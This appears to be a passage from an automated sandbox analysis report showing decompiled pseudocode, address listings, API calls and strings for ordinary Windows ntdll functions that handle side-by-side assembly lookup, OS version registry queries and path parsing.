				_t80 =  *(_t103 + 0xe) & 0x0000ffff;
				if(_t110 > ( *(_t103 + 0xe) & 0x0000ffff)) {
					goto L22;
				}
				_t111 =  *( *( *[fs:0x30] + 0x10) + 0x3c);
				if(( *( *( *[fs:0x30] + 0x10) + 8) & 0x00000001) == 0) {
					_t111 = _t111 +  *( *[fs:0x30] + 0x10);
				}
				memcpy( *(_t103 + 0x10), _t111, _t121);
				_t131 = _t131 + 0xc;
				_t113 = 1;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *(_t103 + 0xc) = _v596 + 0xe;
				if(E6B20D268( *(_t103 + 0x10), 1) != 0) {
					goto L9;
				} else {
					_t80 = 0;
					goto L8;
				}
			}










































                                                                                                                            0x6b20ccc8
                                                                                                                            0x6b20ccd5
                                                                                                                            0x6b20cce0
                                                                                                                            0x6b20cce4
                                                                                                                            0x6b20cce8
                                                                                                                            0x6b20cceb
                                                                                                                            0x6b20ce12
                                                                                                                            0x6b20ce1a
                                                                                                                            0x6b20ce1d
                                                                                                                            0x6b20ce25
                                                                                                                            0x6b20ce2b
                                                                                                                            0x6b20ce2f
                                                                                                                            0x6b20ce30
                                                                                                                            0x6b20ce34
                                                                                                                            0x6b20ce3c
                                                                                                                            0x6b20ce40
                                                                                                                            0x6b20ce44
                                                                                                                            0x6b20ce49
                                                                                                                            0x6b20ce4f
                                                                                                                            0x6b20ce5c
                                                                                                                            0x6b20ce60
                                                                                                                            0x6b20ce64
                                                                                                                            0x6b24ad96
                                                                                                                            0x6b24ad96
                                                                                                                            0x6b24ada4
                                                                                                                            0x6b24ada9
                                                                                                                            0x6b24adad
                                                                                                                            0x6b24adad
                                                                                                                            0x6b24adb2
                                                                                                                            0x6b20cd88
                                                                                                                            0x6b20cd8f
                                                                                                                            0x6b20cd90
                                                                                                                            0x6b20cd91
                                                                                                                            0x6b20cd9c
                                                                                                                            0x6b20cd9c
                                                                                                                            0x6b24adb8
                                                                                                                            0x6b24adbc
                                                                                                                            0x6b24adbc
                                                                                                                            0x6b24adbc
                                                                                                                            0x00000000
                                                                                                                            0x6b20ce4f
                                                                                                                            0x6b20ccf1
                                                                                                                            0x6b20ccf4
                                                                                                                            0x6b20cda0
                                                                                                                            0x6b20cda3
                                                                                                                            0x6b24ac7c
                                                                                                                            0x6b24ac7e
                                                                                                                            0x6b24ac7e
                                                                                                                            0x00000000
                                                                                                                            0x6b20cda3
                                                                                                                            0x6b20ccfa
                                                                                                                            0x6b20ccff
                                                                                                                            0x6b20cdb1
                                                                                                                            0x6b24acc4
                                                                                                                            0x6b24acc8
                                                                                                                            0x6b24accb
                                                                                                                            0x6b24accf
                                                                                                                            0x6b24acd3
                                                                                                                            0x6b24acd9
                                                                                                                            0x6b24ad2b
                                                                                                                            0x6b24ad2b
                                                                                                                            0x00000000
                                                                                                                            0x6b24ad2b
                                                                                                                            0x6b24acdf
                                                                                                                            0x6b24ace0
                                                                                                                            0x6b24ace5
                                                                                                                            0x6b24ace9
                                                                                                                            0x6b24acea
                                                                                                                            0x6b24aceb
                                                                                                                            0x6b24acec
                                                                                                                            0x6b24aced
                                                                                                                            0x6b24acf2
                                                                                                                            0x6b24acf8
                                                                                                                            0x6b24ad34
                                                                                                                            0x6b24ad3d
                                                                                                                            0x6b24ac88
                                                                                                                            0x6b24ac88
                                                                                                                            0x6b24ac8e
                                                                                                                            0x6b24ac94
                                                                                                                            0x6b24ac94
                                                                                                                            0x00000000
                                                                                                                            0x6b24ac8e
                                                                                                                            0x6b24ad47
                                                                                                                            0x6b24ad4b
                                                                                                                            0x6b24ad50
                                                                                                                            0x6b24ad59
                                                                                                                            0x6b24ad61
                                                                                                                            0x6b24ad66
                                                                                                                            0x6b24ad6c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b24ad72
                                                                                                                            0x6b24ad80
                                                                                                                            0x6b24ad85
                                                                                                                            0x00000000
                                                                                                                            0x6b24ad85
                                                                                                                            0x6b24acff
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b24ad01
                                                                                                                            0x6b24ad0e
                                                                                                                            0x6b24ad13
                                                                                                                            0x6b24ad16
                                                                                                                            0x6b24ad1c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b24ad22
                                                                                                                            0x00000000
                                                                                                                            0x6b24ad22
                                                                                                                            0x6b20cdc2
                                                                                                                            0x6b20cdc7
                                                                                                                            0x6b20cdd2
                                                                                                                            0x6b20cdd6
                                                                                                                            0x6b20cdd6
                                                                                                                            0x6b20cddb
                                                                                                                            0x6b24ac9f
                                                                                                                            0x6b24ac9f
                                                                                                                            0x6b24aca5
                                                                                                                            0x6b24acab
                                                                                                                            0x6b24acab
                                                                                                                            0x00000000
                                                                                                                            0x6b24aca5
                                                                                                                            0x6b20cde9
                                                                                                                            0x6b20cdfb
                                                                                                                            0x6b20cdfe
                                                                                                                            0x6b20cdff
                                                                                                                            0x6b20ce00
                                                                                                                            0x6b20ce01
                                                                                                                            0x6b20ce06
                                                                                                                            0x6b20cd84
                                                                                                                            0x6b20cd84
                                                                                                                            0x00000000
                                                                                                                            0x6b20cd84
                                                                                                                            0x6b20cd0b
                                                                                                                            0x6b20cd0e
                                                                                                                            0x6b20cd12
                                                                                                                            0x6b20cd16
                                                                                                                            0x6b20cd16
                                                                                                                            0x6b20cd1f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b20cd25
                                                                                                                            0x6b20cd2b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b20cd3a
                                                                                                                            0x6b20cd4a
                                                                                                                            0x6b24acbc
                                                                                                                            0x6b24acbc
                                                                                                                            0x6b20cd56
                                                                                                                            0x6b20cd66
                                                                                                                            0x6b20cd6c
                                                                                                                            0x6b20cd6e
                                                                                                                            0x6b20cd6f
                                                                                                                            0x6b20cd70
                                                                                                                            0x6b20cd71
                                                                                                                            0x6b20cd75
                                                                                                                            0x6b20cd80
                                                                                                                            0x00000000
                                                                                                                            0x6b20cd82
                                                                                                                            0x6b20cd82
                                                                                                                            0x00000000
                                                                                                                            0x6b20cd82

                                                                                                                            APIs
                                                                                                                            • memcpy.1105(6B1B4F84,?,6B1E6167,00000040,?,?), ref: 6B20CD56
                                                                                                                              • Part of subcall function 6B20D268: RtlInitUnicodeStringEx.1105(?,00000000,00000000,?,?,6B254718,00000030,?,00000000,?,6B23F5F2,?,00000024,00000000,?), ref: 6B20D278
                                                                                                                            • RtlGetNtSystemRoot.1105(00000040,?,?), ref: 6B20CDB7
                                                                                                                            • RtlInitUnicodeString.1105(00000000,00000000,00000040,?,?), ref: 6B20CDC2
                                                                                                                            • memcpy.1105(6B1B4F84,00000000,00000040,00000000,00000000,00000040,?,?), ref: 6B20CDE9
                                                                                                                            • ZwOpenKey.1105(?,00000008,?,?,?,?), ref: 6B20CE44
                                                                                                                            • ZwClose.1105(?,00000040,?,?), ref: 6B24AC7E
                                                                                                                            Strings
                                                                                                                            • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 6B24AD78
                                                                                                                            • \WinSxS\, xrefs: 6B20CDF3
                                                                                                                            • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 6B24AD06
                                                                                                                            • .Local\, xrefs: 6B20CD61
                                                                                                                            • @, xrefs: 6B20CE1D
                                                                                                                            • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 6B24AD9C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InitStringUnicodememcpy$CloseOpenRootSystem
                                                                                                                            • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                                                                            • API String ID: 3618765437-3926108909
                                                                                                                            • Opcode ID: bba5f29f37caa204a32659c68850d5c7f7c05ca8a878517e4f45df6279c0fbff
                                                                                                                            • Instruction ID: 9cf54d1d6de8a26b409dc1e5e66f05b308d202ba874e2b9b8b5a0f3ffb28ed26
                                                                                                                            • Opcode Fuzzy Hash: bba5f29f37caa204a32659c68850d5c7f7c05ca8a878517e4f45df6279c0fbff
                                                                                                                            • Instruction Fuzzy Hash: B181D0B150834A9FD711CF28C8C0A1BBBE4BF86B45F40899DF8949B691D778D944CBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D65A0, Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 157nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 65%
                                                                                                                            			E6B1D65A0(intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
				signed int _v8;
				void* _v28;
				signed int _v300;
				intOrPtr _v304;
				signed int _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				void _v324;
				intOrPtr* _v328;
				void _v332;
				int _v336;
				void* _v340;
				char _v344;
				void* _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				void* _v372;
				void* _v388;
				void* __ebx;
				void* __edi;
				void* __esi;
				void _t75;
				intOrPtr* _t110;
				void* _t111;
				signed int _t112;
				signed int _t118;
				void* _t132;
				void* _t135;
				intOrPtr* _t137;
				void* _t142;
				signed int _t143;
				signed int _t145;

				_t145 = (_t143 & 0xfffffff8) - 0x15c;
				_v8 =  *0x6b2cd360 ^ _t145;
				_t75 = _a4;
				_t124 = 0;
				_v332 = _t75;
				_t110 = _a12;
				_t137 = _a8;
				_v328 = _t137;
				if(_t75 != 0) {
					_push("true");
					_pop(_t112);
					_v340 = 0;
					_v336 = 0;
					memset( &_v324, 0, _t112 << 2);
					_t145 = _t145 + 0xc;
					_v344 = 0;
					_v348 = 0;
					_t132 = 0;
					RtlInitUnicodeString( &_v340, L"\\Registry\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion");
					_v332 = 0x18;
					_v324 =  &_v348;
					_v328 = 0;
					_push( &_v332);
					_push(0x20119);
					_v320 = 0x40;
					_push( &_v352);
					_v316 = 0;
					_v312 = 0;
					if(E6B219600() >= 0) {
						if(E6B1D66D4(_v352, L"UBR",  &_v356) >= 0) {
							_t132 = _v356;
						}
						_push(_v352);
						E6B2195D0();
					}
					_v308 = 0x11c;
					E6B204020( &_v308);
					_t89 = _v344;
					asm("adc esi, edx");
					asm("adc esi, 0x0");
					 *_t89 = 0 + _v300 * 0x10000 + _t132;
					 *((intOrPtr*)(_t89 + 4)) = _v308 * 0x10000 + _v304;
					_t124 = 0;
					_t137 = _v340;
				}
				if(_t137 != 0) {
					_v348 = _t124;
					_v344 = _t124;
					_v356 = 3;
					RtlInitUnicodeString( &_v348, L"Kernel-OneCore-DeviceFamilyID");
					_push( &_v344);
					_push(4);
					_push( &_v364);
					_push( &_v348);
					_push( &_v356);
					E6B21A9B0();
					_t89 =  *((intOrPtr*)(_t145 + 0x10));
					 *_t137 =  *((intOrPtr*)(_t145 + 0x10));
				}
				if(_t110 != 0) {
					_t118 = 6;
					memset( &_v332, 0, _t118 << 2);
					_t145 = _t145 + 0xc;
					_v348 = 0;
					_v344 = 0;
					_v352 = 0;
					_v356 = 0;
					 *_t110 = 0;
					RtlInitUnicodeString( &_v348, L"\\Registry\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\OEM");
					_v340 = 0x18;
					_v332 =  &_v356;
					_push( &_v340);
					_push(0x20119);
					_v336 = 0;
					_push( &_v360);
					_v328 = 0x40;
					_v324 = 0;
					_v320 = 0;
					if(E6B219600() >= 0) {
						_t124 = L"DeviceForm";
						if(E6B1D66D4(_v360, L"DeviceForm",  &_v364) >= 0) {
							 *_t110 = _v364;
						}
						_push(_v360);
						_t89 = E6B2195D0();
					}
				}
				_pop(_t135);
				_pop(_t142);
				_pop(_t111);
				return E6B21B640(_t89, _t111,  *(_t145 + 0x164) ^ _t145, _t124, _t135, _t142);
			}







































                                                                                                                            0x6b1d65a8
                                                                                                                            0x6b1d65b5
                                                                                                                            0x6b1d65bc
                                                                                                                            0x6b1d65bf
                                                                                                                            0x6b1d65c1
                                                                                                                            0x6b1d65c6
                                                                                                                            0x6b1d65ca
                                                                                                                            0x6b1d65cd
                                                                                                                            0x6b1d65d4
                                                                                                                            0x6b2319a6
                                                                                                                            0x6b2319a8
                                                                                                                            0x6b2319ab
                                                                                                                            0x6b2319b3
                                                                                                                            0x6b2319b7
                                                                                                                            0x6b2319b7
                                                                                                                            0x6b2319c2
                                                                                                                            0x6b2319c7
                                                                                                                            0x6b2319cb
                                                                                                                            0x6b2319cd
                                                                                                                            0x6b2319d6
                                                                                                                            0x6b2319de
                                                                                                                            0x6b2319e8
                                                                                                                            0x6b2319ec
                                                                                                                            0x6b2319ed
                                                                                                                            0x6b2319f6
                                                                                                                            0x6b2319fe
                                                                                                                            0x6b2319ff
                                                                                                                            0x6b231a03
                                                                                                                            0x6b231a0e
                                                                                                                            0x6b231a25
                                                                                                                            0x6b231a27
                                                                                                                            0x6b231a27
                                                                                                                            0x6b231a2b
                                                                                                                            0x6b231a2f
                                                                                                                            0x6b231a2f
                                                                                                                            0x6b231a38
                                                                                                                            0x6b231a41
                                                                                                                            0x6b231a66
                                                                                                                            0x6b231a6a
                                                                                                                            0x6b231a6e
                                                                                                                            0x6b231a71
                                                                                                                            0x6b231a73
                                                                                                                            0x6b231a76
                                                                                                                            0x6b231a78
                                                                                                                            0x6b231a78
                                                                                                                            0x6b1d65dc
                                                                                                                            0x6b1d65e7
                                                                                                                            0x6b1d65ec
                                                                                                                            0x6b1d65f0
                                                                                                                            0x6b1d65f8
                                                                                                                            0x6b1d6601
                                                                                                                            0x6b1d6602
                                                                                                                            0x6b1d6608
                                                                                                                            0x6b1d660d
                                                                                                                            0x6b1d6612
                                                                                                                            0x6b1d6613
                                                                                                                            0x6b1d6618
                                                                                                                            0x6b1d661c
                                                                                                                            0x6b1d661c
                                                                                                                            0x6b1d6620
                                                                                                                            0x6b1d663b
                                                                                                                            0x6b1d6644
                                                                                                                            0x6b1d6644
                                                                                                                            0x6b1d664f
                                                                                                                            0x6b1d6654
                                                                                                                            0x6b1d6658
                                                                                                                            0x6b1d665c
                                                                                                                            0x6b1d6660
                                                                                                                            0x6b1d6662
                                                                                                                            0x6b1d666b
                                                                                                                            0x6b1d6673
                                                                                                                            0x6b1d667b
                                                                                                                            0x6b1d667c
                                                                                                                            0x6b1d6685
                                                                                                                            0x6b1d6689
                                                                                                                            0x6b1d668a
                                                                                                                            0x6b1d6692
                                                                                                                            0x6b1d6696
                                                                                                                            0x6b1d66a1
                                                                                                                            0x6b1d66b0
                                                                                                                            0x6b1d66bc
                                                                                                                            0x6b1d66d0
                                                                                                                            0x6b1d66d0
                                                                                                                            0x6b1d66be
                                                                                                                            0x6b1d66c2
                                                                                                                            0x6b1d66c2
                                                                                                                            0x6b1d66a1
                                                                                                                            0x6b1d6629
                                                                                                                            0x6b1d662a
                                                                                                                            0x6b1d662b
                                                                                                                            0x6b1d6636

                                                                                                                            APIs
                                                                                                                            • RtlInitUnicodeString.1105 ref: 6B1D65F8
                                                                                                                            • ZwQueryLicenseValue.1105(?,?,00000003,00000004,?), ref: 6B1D6613
                                                                                                                            • RtlInitUnicodeString.1105(?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\OEM), ref: 6B1D6662
                                                                                                                            • ZwClose.1105(?,?,?,?,?,?,00020119,00000018), ref: 6B1D66C2
                                                                                                                            • ZwOpenKey.1105(?,?,?,?,00020119,00000018), ref: 6B1D669A
                                                                                                                              • Part of subcall function 6B219600: LdrInitializeThunk.NTDLL(6B211119,?,?,00000018,?), ref: 6B21960A
                                                                                                                            • RtlInitUnicodeString.1105(?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 6B2319CD
                                                                                                                            • ZwOpenKey.1105(?,?,?,?,00020119,00000018), ref: 6B231A07
                                                                                                                            • ZwClose.1105(?,?,?,?,?,?,00020119,00000018), ref: 6B231A2F
                                                                                                                            • RtlGetVersion.1105(?,?,?,?,?,00020119,00000018), ref: 6B231A41
                                                                                                                            Strings
                                                                                                                            • Kernel-OneCore-DeviceFamilyID, xrefs: 6B1D65DE
                                                                                                                            • @, xrefs: 6B2319F6
                                                                                                                            • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\OEM, xrefs: 6B1D6646
                                                                                                                            • UBR, xrefs: 6B231A19
                                                                                                                            • @, xrefs: 6B1D668A
                                                                                                                            • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion, xrefs: 6B2319B9
                                                                                                                            • DeviceForm, xrefs: 6B1D66B0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InitStringUnicode$CloseOpen$InitializeLicenseQueryThunkValueVersion
                                                                                                                            • String ID: @$@$DeviceForm$Kernel-OneCore-DeviceFamilyID$UBR$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\OEM
                                                                                                                            • API String ID: 2689724482-2811273990
                                                                                                                            • Opcode ID: 907ae73bea129c09ce97bbe22dfcc507558e8db608aa30dd1f993bc2efdf84e1
                                                                                                                            • Instruction ID: 9444c0dc8ac5e96b053cbfe3c803c8e022162b6179a1ebafa570e88bdbd269c8
                                                                                                                            • Opcode Fuzzy Hash: 907ae73bea129c09ce97bbe22dfcc507558e8db608aa30dd1f993bc2efdf84e1
                                                                                                                            • Instruction Fuzzy Hash: 09511BB15083199FC314CF29C881A8BBBE9BFC9754F40492EFA98D7250D735DA49CB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1F2430, Relevance: 26.7, APIs: 10, Strings: 5, Instructions: 461COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 96%
                                                                                                                            			E6B1F2430(signed char _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr* _a20, signed int _a24, intOrPtr* _a28, int _a32, intOrPtr* _a36) {
				signed int _v8;
				char _v140;
				short _v172;
				char _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				char _v192;
				signed int _v196;
				signed int _v200;
				short* _v204;
				short* _v208;
				short* _v212;
				signed int _v214;
				void _v216;
				short _v224;
				short _v228;
				short* _v232;
				signed short* _v236;
				signed short* _v240;
				short _v242;
				char _v244;
				intOrPtr _v248;
				void* _v252;
				intOrPtr _v256;
				void* _v260;
				char* _v280;
				char _v284;
				int _v288;
				char _v292;
				signed int _v296;
				int _v300;
				signed int _v304;
				int _v312;
				intOrPtr _v316;
				char _v320;
				signed int _v324;
				signed short _v328;
				signed short* _v332;
				signed int _v336;
				char _v337;
				void* _v338;
				void* _v342;
				void* _v344;
				void* _v348;
				void* _v352;
				void* _v353;
				void* _v354;
				void* _v356;
				void* _v364;
				void* _v366;
				void* _v368;
				void* _v370;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t179;
				signed short* _t180;
				intOrPtr _t182;
				intOrPtr _t186;
				short* _t187;
				intOrPtr _t193;
				short* _t194;
				short* _t202;
				signed int _t224;
				char _t225;
				signed int _t226;
				intOrPtr* _t233;
				intOrPtr* _t246;
				void* _t247;
				intOrPtr* _t248;
				char* _t249;
				intOrPtr* _t255;
				short* _t256;
				signed short* _t259;
				signed int _t262;
				intOrPtr* _t264;
				void* _t265;
				signed short* _t266;
				intOrPtr _t267;
				int _t268;
				signed short* _t269;
				void* _t274;
				void* _t275;
				signed int _t276;
				void* _t278;
				signed int _t280;
				signed int _t282;

				_t282 = (_t280 & 0xfffffff8) - 0x154;
				_v8 =  *0x6b2cd360 ^ _t282;
				_t248 = _a28;
				_t258 = _a32;
				_t179 = _a36;
				_t246 = _a20;
				_v296 = _t248;
				_v320 = 0;
				_v316 = 0;
				_v280 =  &_v140;
				_v300 = _t258;
				_v284 = 0x800000;
				_v288 = 0;
				_v328 = 0;
				_v304 = 0;
				_t264 = _a8;
				if(_t248 != 0) {
					 *_t248 = 0;
				}
				if(_t258 != 0) {
					 *_t258 = 0;
				}
				if(_t179 != 0) {
					 *_t179 = 0x208;
				}
				if(_t246 != 0) {
					 *_t246 = 0;
					 *((intOrPtr*)(_t246 + 4)) = 0;
				}
				_t180 =  &_v172;
				_v228 = 0x20;
				_v236 = _t180;
				_v232 = _t180;
				_v240 = _t180;
				_v172 = 0;
				_t182 = _a16;
				_v224 = 0x20;
				_v244 = 0x200000;
				if(_t182 == 0) {
					_t249 =  &_v192;
					_v200 = 2;
					_v208 = _t249;
					_v204 = _t249;
					_v212 = _t249;
					_v196 = 2;
					_v192 = 0;
					_v216 = 0x20000;
				} else {
					_t262 =  *(_t182 + 2) & 0x0000ffff;
					_t256 =  *((intOrPtr*)(_t182 + 4));
					if(_t262 < 2) {
						_t256 =  &_v192;
						_t262 = 2;
					}
					_v208 = _t256;
					_v200 = _t262;
					_v204 = _t256;
					_v196 = _t262;
					_v212 = _t256;
					if(_t256 != 0) {
						 *_t256 = 0;
					}
					_v214 = _t262;
					_t258 = _v300;
					_v216 = 0;
				}
				_t251 = _a24;
				_v188 = _t182;
				_v184 = _t246;
				_v180 = _t251;
				_v176 = 1;
				if((_a4 & 0xfffffffe) != 0) {
					_t274 = 0xc000000d;
					goto L82;
				} else {
					if(_t264 == 0) {
						_t274 = 0xc000000d;
						L82:
						if(_t274 >= 0) {
							L57:
							_t183 = _v316;
							if(_v316 != 0) {
								E6B1DAD30(_t183);
								_v324 = 0;
								_v320 = 0;
							}
							_t186 = _v236;
							if(_t186 != 0) {
								if(_t186 != _v232) {
									_v248 = _t186;
									RtlFreeUnicodeString( &_v252);
								}
								_v240 = _v236;
								_v232 = _v228;
							}
							_t187 = _v232;
							_v240 = _t187;
							if(_t187 != 0) {
								_t251 = 0;
								 *_t187 = 0;
							}
							_v244 = 0;
							_v242 = _v224;
							if(_t274 == 0xc0150001) {
								E6B275100(_t251, "Internal error check failed", "minkernel\\ntdll\\sxsisol.cpp", 0x1b2, "Status != STATUS_SXS_SECTION_NOT_FOUND");
								_t274 = 0xc00000e5;
								goto L82;
							} else {
								_pop(_t265);
								_pop(_t275);
								_pop(_t247);
								return E6B21B640(_t274, _t247, _v8 ^ _t282, _t258, _t265, _t275);
							}
						}
						L51:
						if(_v176 != 0) {
							_t193 = _v208;
							if(_t193 != 0 && _t193 != _v204) {
								_v256 = _t193;
								RtlFreeUnicodeString( &_v260);
							}
							_t194 = _v204;
							if(_t194 != 0) {
								_t251 = 0;
								 *_t194 = 0;
							}
						}
						memset( &_v216, 0, 0x2c);
						_t282 = _t282 + 0xc;
						goto L57;
					}
					if(_t182 == 0) {
						if(_t246 != 0 || _t258 == 0) {
							L15:
							_t251 = 0;
							_t266 =  *(_t264 + 4);
							_v336 =  *_t264;
							_t202 = _a12;
							_v332 = _t266;
							_v338 = 0;
							if(_t202 == 0 ||  *_t202 == 0) {
								L23:
								_t274 = 0;
								goto L24;
							} else {
								_v337 = 0;
								_t278 = E6B1F3690(1,  &_v336, 0x6b1b11bc,  &_v292);
								if(_t278 < 0) {
									if(_t278 == 0xc0000225) {
										L19:
										_t274 = 0;
										L20:
										_t266 = _v332;
										if(_t274 < 0) {
											L97:
											_t251 = _v338;
											L24:
											if(_t274 < 0) {
												goto L51;
											}
											if(_t251 != 0) {
												_t266 = _v240;
												_v336 = _v244;
												_v332 = _t266;
											}
											_v312 = 0;
											_v338 = 0;
											if(_v316 != 0) {
												_t274 = 0xc000000d;
												goto L42;
											} else {
												_t224 = _v336;
												if(_t224 < 2) {
													L30:
													if(_t224 < 4 ||  *_t266 == 0 || _t266[1] != 0x3a || _t224 < 6) {
														L40:
														_t225 = _v338;
														goto L41;
													} else {
														_t226 = _t266[2] & 0x0000ffff;
														if(_t226 != 0x5c) {
															if(_t226 != 0x2f) {
																goto L40;
															}
														}
														_v324 = 2;
														L36:
														_t274 = E6B1F3850( &_v336,  &_v284,  &_v320,  &_v312, 0, 0,  &_v324, 0);
														if(_t274 < 0) {
															L42:
															_t204 = _v316;
															if(_v316 != 0) {
																E6B1DAD30(_t204);
																_v324 = 0;
																_v320 = 0;
															}
															L43:
															if(_t274 < 0) {
																goto L51;
															}
															if((_a4 & 0x00000001) == 0 ||  *((intOrPtr*)( *[fs:0x30] + 0x10)) == 0 || ( *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 8) & 0x00001000) == 0) {
																L47:
																_t267 = _a16;
																if((_v304 & 0x00000001) != 0) {
																	L77:
																	if(_t246 == 0) {
																		if(_t267 == 0 || _v212 ==  *((intOrPtr*)(_t267 + 4))) {
																			goto L78;
																		} else {
																			_t274 = 0xc0000023;
																			goto L82;
																		}
																	}
																	L78:
																	_t268 = _v300;
																	if(_t268 != 0) {
																		_t274 = E6B1F3690(1,  &_v216, 0x6b1b1810,  &_v328);
																		if(_t274 < 0) {
																			goto L51;
																		}
																		 *_t268 = ((_v328 & 0x0000ffff) >> 1) + 1;
																	}
																	_t251 =  &_v216;
																	_t274 = E6B215969( &_v216);
																	if(_t274 < 0) {
																		goto L51;
																	}
																	_t251 = _v296;
																	if(_t251 != 0) {
																		 *_t251 = _v304;
																	}
																	_t274 = 0;
																	goto L82;
																}
																if(_t267 == 0) {
																	if(_t246 != 0) {
																		goto L49;
																	}
																	_t258 = 1;
																	L50:
																	_t251 =  &_v336;
																	_t274 = E6B1F2990( &_v336, _t258,  &_v288, _v296,  &_v216);
																	if(_t274 >= 0) {
																		goto L77;
																	}
																	goto L51;
																}
																L49:
																_t258 = 0;
																goto L50;
															} else {
																_t258 =  &_v216;
																_t251 =  &_v336;
																_t274 = E6B2640D2( &_v336,  &_v216,  &_v304);
																if(_t274 < 0) {
																	goto L51;
																}
																goto L47;
															}
														}
														_t233 = _v312;
														_t276 =  *_t233;
														_t269 =  *(_t233 + 4);
														_v312 = _t276;
														if(_v324 == 6) {
															_t259 = _v332;
															if( *((short*)(_t259 + 0xa)) != 0x3a ||  *((short*)(_t259 + 0xc)) != 0x5c) {
																goto L38;
															} else {
																_v332 = _t259 + 8;
																_t251 = _v336 + 0xfff8;
																 *((intOrPtr*)(_t282 + 0x16)) =  *((intOrPtr*)(_t282 + 0x16)) + 0xfff8;
																_t258 = _v312 + 0xfff8;
																_t269 =  &(_t269[4]);
																_v312 = _t258;
																 *((intOrPtr*)(_t282 + 0x2e)) =  *((intOrPtr*)(_t282 + 0x2e)) + 0xfff8;
																_t276 = _v312;
																_v336 = _t251;
																L39:
																if(_t251 > _t258) {
																	_t251 =  &_v320;
																	if(_t233 ==  &_v320) {
																		_t225 = 1;
																	} else {
																		_t225 = _v338;
																	}
																	_v336 = _t276;
																	_v332 = _t269;
																	L41:
																	_t274 = 0;
																	if(_t225 != 0) {
																		goto L43;
																	}
																	goto L42;
																}
																goto L40;
															}
														}
														L38:
														_t251 = _v336;
														_t258 = _v312;
														goto L39;
													}
												}
												_t251 =  *_t266 & 0x0000ffff;
												if(_t251 == 0x5c || _t251 == 0x2f) {
													if(_t224 < 4) {
														goto L40;
													}
													_t251 = _t266[1] & 0x0000ffff;
													if(_t251 == 0x5c || _t251 == 0x2f) {
														if(_t224 < 6) {
															L110:
															_v324 = 1;
															goto L36;
														}
														_t251 = _t266[2] & 0x0000ffff;
														if(_t251 == 0x2e || _t251 == 0x3f) {
															if(_t224 < 8) {
																L109:
																if(_t224 == 6) {
																	goto L40;
																}
																goto L110;
															}
															_t251 = _t266[3] & 0x0000ffff;
															if(_t251 == 0x5c || _t251 == 0x2f) {
																_v324 = 6;
																goto L36;
															} else {
																goto L109;
															}
														} else {
															goto L110;
														}
													} else {
														goto L40;
													}
												} else {
													goto L30;
												}
											}
										}
										if(_v337 == 0) {
											_t255 = _a12;
											 *(_t282 + 0x50) = _v336;
											 *(_t282 + 0x54) = _t266;
											 *((intOrPtr*)(_t282 + 0x58)) =  *_t255;
											 *((intOrPtr*)(_t282 + 0x5c)) =  *((intOrPtr*)(_t255 + 4));
											_v244 = 0;
											_t274 = E6B20D5C0(_t255,  &_v244, 2, _t282 + 0x50);
											if(_t274 < 0) {
												goto L97;
											}
											_t251 = 1;
											goto L23;
										}
										_t251 = _v338;
										goto L23;
									}
									goto L20;
								}
								_v337 = 1;
								goto L19;
							}
						} else {
							L96:
							_t274 = 0xc000000d;
							goto L82;
						}
					}
					if(_t246 == 0 || _t251 != 0) {
						goto L15;
					} else {
						goto L96;
					}
				}
			}



























































































